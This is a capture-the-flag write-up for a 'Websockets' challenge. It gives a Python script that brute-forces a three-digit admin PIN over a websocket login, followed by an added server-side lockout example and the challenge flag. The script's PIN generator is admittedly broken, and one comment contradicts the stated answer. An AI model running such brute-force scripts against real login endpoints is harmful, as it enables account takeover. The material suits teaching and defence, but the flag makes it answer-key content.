Websockets
Censored
Challenge
Can you hack my website?
Solution
Go to the site and we see an employee login; go to that and we see a username and PIN field. Hit inspect element and we see that Tom is an idiot who uses 3-digit PINs.
Now we need to bruteforce that, which should be pretty straightforward with a Python script:
#!/usr/bin/env python3
import time
# create_connection comes from the websocket-client package
from websocket import create_connection

url = "ws://web1.utctf.live:8651/internal/ws"
user = "admin"
pins = []

'''
this generator is borked, it doesn't
generate all possible pin combinations
instead it only goes from 012 -> 987
'''
def generate_pins(L):
    for i in range(0, 10):
        for j in range(0, 10):
            for k in range(0, 10):
                # check if the indexes are not
                # the same
                if (i != j and j != k and i != k):
                    pin = str(L[i]) + str(L[j]) + str(L[k])
                    pins.append(pin)

generate_pins([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])

res = ""
'''
sending it all on one connection
leads to broken pipe so instead we
create a new connection for every
pin
'''
for pin in pins:
    time.sleep(0.5)
    ws = create_connection(url)
    ws.send("begin")
    ws.send("user " + user)
    res = ws.recv()
    ws.send("pass " + pin)  # send the candidate pin, not a fixed value
    res = ws.recv()
    print(pin + " - " + res)
    if res != "badpass":
        print(pin + " - goodpass")
    ws.close()

'''
pins from 012 -> 987 don't work, pretty sure that's not all
possible pins tho :thinking:
nope just checked, that's not all possible pins
000 -> 987 all badpass confirmed
907 -> correct pin
'''
As said in the code, generate_pins() is borked, so after running that and confirming that all pins in the range 012 -> 987 are incorrect, we can manually test the remaining pins, which leads to 907 being the correct one.
And of course this can be optimized to run faster with threading, and probably with an actual working generate_pins() function as well.
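The script above drives a begin / user / pass exchange that the server answers with badpass, and it opens a fresh connection per guess. As an added example (not part of the original writeup and not the challenge's own server code), here is the server-side piece that stops a 1000-value PIN space from being walked that way: a per-user failure counter that lives outside the individual websocket session. The "ok"/"error"/"locked" replies, the five-attempt limit, the lockout length and the user table are all assumptions.

```python
#!/usr/bin/env python3
import hmac
import time

MAX_FAILURES = 5        # assumed policy: lock the user after five bad PINs
LOCKOUT_SECONDS = 900   # assumed policy: 15 minute lock

# Constructed user table; a real server stores a hash, a plain PIN keeps this short.
USERS = {"admin": "907"}


class LoginGuard:
    """Shared across connections, so one-guess-per-connection gains nothing."""

    def __init__(self):
        self.failures = {}      # user -> consecutive bad PINs
        self.locked_until = {}  # user -> epoch seconds until the lock expires

    def attempt(self, user, pin, now=None):
        now = time.time() if now is None else now
        if self.locked_until.get(user, 0) > now:
            return "locked"     # refuse without revealing whether the PIN was right
        expected = USERS.get(user)
        # constant-time compare; unknown users fall through to the same failure path
        if expected is not None and hmac.compare_digest(expected, pin):
            self.failures.pop(user, None)
            return "goodpass"
        count = self.failures.get(user, 0) + 1
        self.failures[user] = count
        if count >= MAX_FAILURES:
            self.locked_until[user] = now + LOCKOUT_SECONDS
            self.failures.pop(user, None)
            return "locked"
        return "badpass"


class Session:
    """One websocket connection, handling the page's begin / user / pass grammar."""

    def __init__(self, guard):
        self.guard, self.user, self.started = guard, None, False

    def handle(self, msg, now=None):
        if msg == "begin":
            self.started = True
            return "ok"
        if not self.started:
            return "error"
        if msg.startswith("user "):
            self.user = msg[5:]
            return "ok"
        if msg.startswith("pass ") and self.user is not None:
            return self.guard.attempt(self.user, msg[5:], now)
        return "error"
```

Because the counter is keyed on the user rather than the connection, the correct PIN is refused while the lock is active and the 0.5 s per-connection pacing in the script no longer helps.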
Flag
utflag{w3bsock3ts}